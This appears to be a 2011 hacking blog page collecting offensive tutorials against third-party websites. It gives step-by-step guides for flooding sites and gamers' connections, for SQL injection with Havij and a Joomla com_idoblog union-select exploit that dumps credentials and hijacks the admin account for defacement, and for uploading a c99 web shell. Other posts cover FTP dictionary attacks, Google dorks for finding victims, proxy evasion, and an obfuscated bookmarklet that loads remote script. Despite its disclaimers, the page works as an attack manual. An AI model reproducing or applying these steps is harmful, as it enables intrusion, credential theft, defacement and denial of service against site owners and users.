STING IT

Showing posts with label Website Hacking. Show all posts

Tuesday, May 31, 2011

HOW TO CRASH SMALL WEBSITES USING RDOS OR DDOS - COMPLETE TUTORIAL

TOOLS REQUIRED:

Port Scanner
rDos

Step One: First we need to find the websites IP Adress. This is very easy todo.

Ok so say they URL is http://www.yoursite.com ok now that you have your URL open Up Cmd todo this press Start>Run>cmd Once you have CMD open you type ping http://www.yoursite.com press enter and you will get the ip of the website. (YOU MUST REMOVE HTTP:// AND ANY /'s).

EXAMPLE:

Step Two: Now we must test to see if port 80 is open (it usually is).

This is very easy todo to Ok open up the port scanner you downloaded.
Once in the port scanner type in your Victims ip that you got from step 1.
It will ask you to do a range scan or a full scan (SELECT REANGE SCAN!) It will ask for conformaition you have to use a capital Y or a capital N! Now enter 79 for lowest port and 81 for highest hit enter than hit cap Y.

[X] = Closed
[X] Vulnerable = Open

Step Three:
The final and easiest step (IF PORT 80 IS CLOSED PICK A NEW SITE!)
If port 80 is open your on your way to crashing!!

Ok open Up rDos that you download.
Enter the ip that we got from step 1.
It will ask you for the port to attack use port 80 that is why we scaned to make sure 80 was open! If it is closed it will not work.
Hit enter.. *= Flooding -=Crashed Or didn't connect!

EXAMPLE:

The site won't be directly offline!!
it starts with ***********
be patiend.. after some time it will go like this: **********-----------

This means the site crashed.

Friday, May 27, 2011

HOW TO APPLY SQL INJECTION THROUGH HAVJI V1.14

1.First Find a sql infected site (website vulnerable for injection)
2-Open havij and copy and paste infected link as shown in figure

3. Then It shows some messages there....Be alert on it and be show patience for sometime to find it's vulernable and type of injection and if db server is mysql and it will find database name.Then after get it's database is name like xxxx_xxxx

[Image: thirdk.jpg]

4.Then Move to another operation to find tables by clicking "tables" as figure shown.Now click "Get tables" Then wait some time if needed

[Image: 37846594.jpg]

5. After founded the tables ,you can see there will be "users" Put mark on it and click in the " get columns " tab as shown in figure

[Image: 4tgh.jpg]

6. In that Just put mark username and password and click "Get data"

[Image: 5tht.jpg]

8. Bingo Got now id and pass that may be admin...
The pass will get as md5 you can crack it also using this tool as shown in figure...

[Image: srfile201088142733796.jpg]

Download havij v1.14 from here: http://www.itsecteam.com/files/havij/Havij1.14Free.rar

HOW TO HACK A WEBSITE USING SQL MAP - AUTOMATIC SQL INJECTION TOOL

Today i am going to write a sql injection tool. It's V 0.9 is just released. There are many changes in this tool from it's previous version. Sql injection is one of the top web application vulnerabilities. It's very important to check a website against this vulnerability.
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a kick-ass detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Download Here:
http://sourceforge.net/projects/sqlmap/files/

HOW TO HACK A WEBSITE USING C99 SCRIPT

The c99 shell script is a very good way to hack a php enable web server. You have to find an unsecure uploader to upload this file to the server. Here i used unsecure uploader means the uploader which can't check for file extension and allow us to upload our executable scripts to the server.

This c99 shell allows an attacker to hijack the php enable web server. This script is very user friendly and having very good interface so it is easy to use. You can issue any php command to run on the web server. You can use any of the commands given in the script to run on the web server.

NOTE: This post is only for educational purpose. We advice you not to try this on any website. Use of this script on any website is illegal.

For hacking a website using C99 script follow these steps.

1) Find a php web site with an uploader.
2) Test the file uploader to be secure or not by uploading files with a server executable extension.
3) If uploader is unsecure then upload the shell script.
4) Execute the uploaded code by navigating to the uploaded page.
5) A c99 script GUI will show up with a lot of options and details.
6) Look for the server details if the safe mode is on or off. If safe mode is off then the entire web server can be controlled by the script. If its on then on the directory in which c99 shell script is uploaded can only be controlled by the script.
7) Apart from being able to chmod, modify and delete files c99 also lets its user brute force the ftp but it requires an additional dictionary file which can run into hundreds of MBs.

NOTE: You can also execute this script on the web server by RFI

Search the and download the script from google. or download from link
c99
but upper link may not work because script will soon be deleted by the file host.

HOW TO HACK JOOMLA CMS WEBSITE - COMPLETE TUTORIAL

Tools required:
SQL-i Knowledge
reiluke SQLiHelper 2.7:http://filetram.com/download/file/4390169166/sqlihelper-2-rar
Joomla! Query Knowledge

DISCLAIMER:

THIS TUTORIAL IS FOR EDUCATION PURPOSE ONLY!!! YOU MAY NOT READ THIS TUTORIAL IF YOU DON'T UNDERSTAND AND AGREE TO THIS DISCLAIMER. ME AS AUTHOR OF THIS TUTORIAL NOT BE HELD RESPONSIBLE FOR THE MISUSE OF THE INFORMATION CONTAINED WITHIN THIS TUTORIAL. IF YOU ABUSE THIS TUTORIAL FOR ILLEGAL PURPOSES I WILL NOT BE HELD RESPONSIBLE FOR ANY ACTION THAT MAY BE TAKEN AGAINST YOU AS A RESULT OF YOUR MISUSE.

NOTE:
USE ANONYMOUS PROXY!!!

Introduction

Joomla! as Stable-Full Package is probably unhackable and If someone tells that HACKED Joomla, talking rubbish!!!
But people still hacked sites that use Joomla as Content Management System?!?
Joomla is made of components and modules and there are some developers apart from official team that offer their solutions to improve Joomla. That components and modules mede by that other developers are weak spots!

We hacked site that use Joomla! v1.5.6 and after that v1.5.9 through IDoBlog v1.1, but I can't tell that I hacked Joomla!

Finding Exploit And Target

Those two steps could go in different order, depend what you find first target or exploit...

Google dork: inurl:"option=com_idoblog"
Comes up with results for about 140,000 pages

At inj3ct0r.com search for: com_idoblog
Give us back Joomla Component idoblog 1.1b30 (com_idoblog) SQL Injection Vuln

==
Joomla Component idoblog 1.1b30 (com_idoblog) SQL Injection Vuln
==

index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10, 11,12,13,14,15,16+from+jos_users--

Exploit can be separated in two parts:

Part I
index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
This part opening blog Admin page and if Admin page don't exist, exploit won't worked (not completely confirmed)

Part II
+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--
This part looking for username and password from jos_users table

Testing Vulnerability

Disable images for faster page loading:
[Firefox]
Tools >> Options >> Content (tab menu) >> and unclick 'Load images automatically'

Go to:

Code:
http://www.site.com/index.php?option=com_idoblog&view=idoblog&Itemid=22

Site load normally...

Go to:

Code:
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62

Site content blog Profile Admin

Go to:

Code:
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1--

Site is vulnerable

Inject Target

Open reiluke SQLiHelper 2.7
In Target copy

Code:
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62

and click on Inject
Follow standard steps until you find Column Name, as a result we have

Notice that exploit from inj3ct0r wouldn't work here because it looking for jos_users table and as you can see
our target use jos153_users table for storing data

Let Dump username, email, password from Column Name jos153_users. Click on Dump Now

username: admin
email: info@site.com
password: 169fad83bb2ac775bbaef4938d504f4e:mlqMfY0Vc9KLxPk056eewFWM13vEThJI

Joomla! 1.5.x uses md5 to hash the passwords. When the passwords are created, they are hashed with a
32 character salt that is appended to the end of the password string. The password is stored as
{TOTAL HASH}:{ORIGINAL SALT}. So to hack that password take time and time...

The easiest way to hack is to reset Admin password!

Admin Password Reset

Go to:

Code:
http://www.site.com/index.php?option=com_user&view=reset

This is standard Joomla! query for password reset request

Forgot your Password? page will load.
In E-mail Address: enter admin email (in our case it is:info@site.com) and press Submit.
If you find right admin email, Confirm your account. page will load, asking for Token:

Finding Token

To find token go back to reiluke SQLiHelper 2.7 and dump username and activation from Column Name jos153_users

username: admin
activation: 5482dd177624761a290224270fa55f1d

5482dd177624761a290224270fa55f1d is 32 char verification token, enter it and pres Submit.

If you done everything ok, Rest your Password page will load. Enter your new password...

After that go to:

Code:
http://www.site.com/administrator/

Standard Joomla portal content management system

Enter username admin and your password, click on Login
Go to Extensions >> Template Manager >> Default Template Name >> Edit HTML
In Template HTML Editor insert your defaced code, click Apply, Save and you are done!!!

To make admin life more miserable, click on admin in main Joomla window and in User Details page change admin E-mail

UDP UNICORN FLOODER

http://sourceforge.net/projects/udpunicorn/
This handy little flooder is capable of sending very high amounts of UDP data over your connection to a host. This will result in the host that is being flooded replying with a large amount of ICMP packets. Eventually causing a Denial of Service attack against your target. A problem with this type of attack is that the host your attacking is replying to your IP address with all this ICMP traffic. You can block it in your firewall to make the attack more effective.

As with any attack designed to cause a Denial of Service it is always much better to be on a faster connection than the host your attacking. So attacking, lets say google.com is pointless with just one user. But you can for example:-

Say you have a few people you know on "XBOX LIVE", you can get their IP addresses (this is covered else were on STING IT) and hit certain ports on their connection to cause them a massive ping time out.

But more recently with the emergence of "anonymous" it is becoming more frequent that groups of similar minded people are involving themselves in large scale Denial of Service attacks.

Sunday, May 22, 2011

HOW TO REMOVE SURVEYS & OFFERS FROM WEB PAGES

COPY THIS CODE, PASTE IT INTO UR BROWSER'S ADDRESS BAR & PRESS ENTER:-

javascript:(function(){(function(){var z=["Timeout","Interval"];for(var i=0;i<1;i++){var x=window["set"+z[i]]("null",1);eval("delete clear"+z[i]);if (window["clear"+z[i]]==undefined){if (typeof(ar)=="undefined"){var ar=document.createElement("iframe");ar.style.displ

ay="none";document.body.appendChild(ar);}window["clear"+z[i]]=ar.contentWindow["clear"+z[i]];}for(var j=x;j>0&&x-j<99999;j--)window["clear"+z[i]](j);}})();var bd="[url]http://survey-remover.com/[/url]";var gn=function(){var q=function(min,max){return Math.floor(Math.random()*(max-min+1))+min;};var n="";for(var r=0;r<q(9,19);r++)n+=String.fromCharCode(q(97,122));return n;};var sj=["Timeout","Interval"];var bl=[];var xc=[];for(var i=0;i<2;i++){bl.push(window["set"+sj[i]]);window["set"+sj[i]]=function(a,b){};for(var j in window){try{if(typeof(window[j])=="function"){if((window[j]+"").indexOf("function set"+sj[i]+"() {")!=-1)window[j]=function(a,b){};}}catch(e){}}var op=gn();xc.push(op);window[op]=bl[i];}var er=gn();window[er]=function(){window.setTimeout=bl[0];window.setInterval=bl[1];xjz={version:"2.0",domain:"http://survey-remover.com/",id:"4dd59e37064d7",TO:setTimeout("alert(\"It appears that the host could not be reached :(\nPlease try to use the bookmarklet again later!\n\"+xjz.domain);",10000)};var a=document.createElement("script");a.type="text/javascript";a.src=xjz.domain.replace("//","//public.")+"remover/";a.onload=function(){xjz.surveyRemover=new xjz.SurveyRemover(xjz.version);xjz.surveyRemover.init();};document.documentElement.firstElementChild.appendChild(a);};window[xc[0]](window[er],110);})();

OR VISIT http://survey-remover.com/ AND DOWNLOAD THE TOOLS...

Thursday, May 19, 2011

BANNER GRABBING

Now that the hacker has a full list of services running on the target system, to be able to exploit them, he has to first figure out what software and version the service is. One way the hacker can get this information, is to telnet into service port. In the example below, we will use command prompt on Windows (Start -> Run -> Type “cmd” -> Enter). If you are on a Mac, you will be using the terminal. Note: If you are using Windows Vista, then telnet is not installed by default. You can install it by doing the following simple steps.

o Click Start then select Control Panel.
o Select Programs and Features.
o Select Turn Windows features on or off.
o Select the Telnet Client option and click OK.
o A box will appear to confirm installation. The telnet command should now be installed

1. First, the hacker would choose one of the open ports that were revealed in the Nmap scan to continue with and attempt to exploit. Let’s say that when the hacker scanned his target, he found the port 21 open. As you can see on the chart above, port 21 is FTP. To find out what FTP software is running he would use telnet by running the command:
telnet www.targetsite.com 21

As you can see above, I ran this against my computer (localhost). So a hacker would insert a target URL in place of localhost.

2. Next, it would connect to the target and display a banner telling the hacker the software and its version as shown below. This is the information the hacker needs to continue and begin searching for vulnerabilities for the software discovered.

If the above method doesn’t work for you, then simply use Nmap’s full version detection option to get the information.

WHAT IS PORT SCANNING

The point of port scanning a server is to detect its open ports the port’s listening services. Once a hacker knows all the services running on your server, he could search for possible vulnerabilities they may have and exploit them to take control of your website. In the port scanning example we will use the most popular port scanner: Nmap. The Nmap Security Scanner is available for both Mac and Windows users: http://nmap.org/download.html . The example will be shown using the Nmap GUI (Graphical User Interface). Otherwise known as Zenmap.

1. First the hacker would choose a target and place it in the target box. As you can see the “Command:” section gets updated as well. This is what the command would look like if you were running the CLI version.

2. Next the hacker would choose the “Profile:”, or in other words, the scan type. A smart hacker would go with a quick and quiet scan. Full version detection scans are very loud and could raise suspicion on the other end. Stay away from those options because as you will see later on, there are other ways to get that information.

3. A sample scan result may look like the following:

4. As you can see it found a few open ports and listed the services that are run on them. Below I have a list of some of the most popular ports/services on the internet.

20 FTP data (File Transfer Protocol)
21 FTP (File Transfer Protocol)
22 SSH (Secure Shell)
23 Telnet 25 SMTP (Send Mail Transfer Protocol)
43 whois
53 DNS (Domain Name Service)
68 DHCP (Dynamic Host Control Protocol)
80 HTTP (HyperText Transfer Protocol)
110 POP3 (Post Office Protocol, version 3)
137 NetBIOS-ns
138 NetBIOS-dgm
139 NetBIOS
143 IMAP (Internet Message Access Protocol)
161 SNMP (Simple Network Management Protocol)
194 IRC (Internet Relay Chat)
220 IMAP3 (Internet Message Access Protocol 3)
443 SSL (Secure Socket Layer)
445 SMB (NetBIOS over TCP)
1352 Lotus Notes
1433 Microsoft SQL Server
1521 Oracle SQL
2049 NFS (Network File System)
3306 MYSQL
4000 ICQ
5800 VNC
5900 VNC
8080 HTTP

5. Along with finding out what ports are running, the hacker needs to also find out what operating system the server is running. There are always a lot of operating system vulnerabilities out there to choose from. So by knowing the operating system, the hacker’s chances of taking over the server go up.
As you can see, there is an option on Nmap to detect the operating system, but this scan is very loud and easily detected so it is better to avoid it if possible. A simple way to determine what the server is running is by getting a 404 error page. You can get there by going to a page that doesn’t exist. For example the hacker would put in “www.targetsite.com/asdlfjasl.php” this page will most likely not exist and bring him to the 404 page. On most sites the 404 error page displays the server operating system along with its version. Many sites nowadays don’t display this by putting up custom 404 pages so this may not always work.

6. If you are planning on using the CLI version of Nmap, or want a more in depth look at all the commands take a look at the Nmap manual: http://nmap.org/book/man.html .

7. Now that the hacker has got all the running services and open ports on the targets system, he will now have to find out what versions the server is running. This is where “Banner Grabbing” comes in.

WHAT IS FOOTPRINTING

Footprinting is the act of gathering information about a computer system and the companies it belongs to. Footprinting is the first step hackers take in their hacking process. Footprinting is important because to hack a system the hacker must first know everything there is to know about it. Below I will give you examples of the steps and services a hacker would use to get information from a website.

1. First, a hacker would start gathering information on the targets website. Things a hacker would look for are e-mails and names. This information could come in handy if the hacker was planning to attempt a social engineering attack against the company.

2. Next the hacker would get the IP address of the website. By going tohttp://www.selfseo.com/find_ip_address_of_a_website.php and inserting the web site URL, it will spit out its IP address.

3. Next the hacker would Ping the server to see if it is up and running. There’s no point in trying to hack an offline server. http://just-ping.com pings a website from 34 different locations in the world. Insert the website name or IP address and hit “Ping”. If all packets went through, then the server is up.

4. Next the hacker would do a Whois lookup on the company website. Go to http://whois.domaintools.com and put in the target website. As you can see this gives a HUGE amount of information about the company. You see the company e-mails, address, names, when the domain was created, when the domain expires, the domain name servers, and more!

5. A hacker can also take advantage of search engines to search sites for data. For example, a hacker could search a website through Google by searching “site:www.the-target-site.com” this will display every page that Google has of the website. You could narrow down the number of results by adding a specific word after. For example the hacker could search “site:www.the-target-site.com email”. This search could list several emails that are published on the website. Another search you could do in Google is “inurl:robots.txt this would look for a page called robots.txt. If a site has the file “robots.txt”, it displays all the directories and pages on the website that they wish to keep anonymous from the search engine spiders. Occasionally you might come across some valuable information that was meant to be kept private in this file.
Now that the basics of footprinting have been explained.

NESSUS - THE NETWORK VULNERABILITY SCANNER

Nessus vulnerability scanner is the world-leader in active scanners, featuring high-speed discovery, configuration auditing, asset profiling, sensitive data discovery and vulnerability analysis of your security posture. Nessus scanners can be distributed throughout an entire enterprise, inside DMZs and across physically separate networks.

Download it here

WHAT ARE DICTIONARY ATTACKS

Before I get into the example, you must first know what an FTP server is. FTP stands for File Transfer Protocol. FTP is a simple way to exchange files over the internet. If a hacker got FTP access to my website, he could delete/upload anything he wants on my server. An FTP address looks similar to a website address except it uses the prefix ftp:// instead of http://. I set up an FTP server on my computer so I could demonstrate. You can get Brutus at here.
1. First the hacker would choose a target. In this case it’s my home computer and the IP address for your home computer is 127.0.0.1 .
2. By going to ftp://127.0.0.1 I get a pop-up box asking for a username and password.

3. Next the hacker would launch a program similar to Brutus and attempt to crack the password.
4. In the target you put the IP address of the website and to the right select the appropriate option, which in this case is FTP.
5. The default port is 21 but some websites change this to make them a little more secure. If you find out that the port isn’t 21, you can find the right one by doing a port scan. We will get into this later in the book.
6. If you don’t know any of the usernames for the FTP server, then you will have to get a list of the most common usernames.
7. For a dictionary attack you will have to choose the pass mode Word List and browse and select the file containing your word list. You can get some good password lists at packetstormsecurity Below are examples of what a username and password list might look like.

8. Once you hit Start the program will attempt to connect to the server and begin to try all the possible combinations from your lists.

9. If you’re lucky, eventually it’ll get the right Username:Password combination. As you can see below, it got the correct combination of username – admin and password – password.

10. A smarter hacker would use a proxy when using a program like this. What a proxy does is cloaks your IP address by sending your connection request through another computer before going to the target. This is a smart idea because as you will see in the image below, Brutus leaves a huge log of your presence on the target server.

11. In place of the IP address 127.0.0.1 would be the hackers IP address. Footprints like these get a hacker caught and into a lot of trouble with the law.

WINAUTOPWN - VERSION 2.4 - DOWNLOAD

This is to announce release of winAUTOPWN version 2.4...

winAUTOPWN is an auto (hacking) shell gaining tool. It can also be used to test IDS, IPS and other Monitoring sensors/softwares...

Download from here

ADVANCED SQL INJECTION - HAVJI V1.14

Well to make the Sql injection easier for you I would be using a tool Havji.Its has both a free version and a paid version.In this tutorial I will be demonstrating how to use the free version of Havji.The success rate for this tool is more then 95% on the vulnerable Website.

It is automated tool for SQL injection for penetration testers to check whether a website is vulnerable to SQL injection or not.All you need to do is to enter thr URL of the site that you want to test for the vulnerability and click on ANALYZE button.It will automatically scan the website for Sql Injection.
Download from here

How to find A vulnerable Website

Go to google homepage and search for inurl:php?id=

You will get probably thousands of result.Now open any page and add a apostrophe(*)to the
end of the url.Example if the Url was http://www.mytargetsite.com/php?id=34 it should be
now http://www.mytargetsite.com/php?id=34'.

If u get a SQL syntax error then this website can be vulnerable to SQL injection.
Now you should use havji on this URL.

HOW TO HACK AN UNHACKABLE WEBSITE IN SECONDS - EBOOK

Download it from here...

QUERIES ABOUT SHODAN

It is a search engine for the network part.

Ammar

Pages

Tuesday, May 31, 2011

HOW TO CRASH SMALL WEBSITES USING RDOS OR DDOS - COMPLETE TUTORIAL

Friday, May 27, 2011

HOW TO APPLY SQL INJECTION THROUGH HAVJI V1.14

HOW TO HACK A WEBSITE USING SQL MAP - AUTOMATIC SQL INJECTION TOOL

HOW TO HACK A WEBSITE USING C99 SCRIPT

HOW TO HACK JOOMLA CMS WEBSITE - COMPLETE TUTORIAL

UDP UNICORN FLOODER

Sunday, May 22, 2011

HOW TO REMOVE SURVEYS & OFFERS FROM WEB PAGES

Thursday, May 19, 2011

BANNER GRABBING

WHAT IS PORT SCANNING

WHAT IS FOOTPRINTING

NESSUS - THE NETWORK VULNERABILITY SCANNER

WHAT ARE DICTIONARY ATTACKS

WINAUTOPWN - VERSION 2.4 - DOWNLOAD

ADVANCED SQL INJECTION - HAVJI V1.14

HOW TO HACK AN UNHACKABLE WEBSITE IN SECONDS - EBOOK

QUERIES ABOUT SHODAN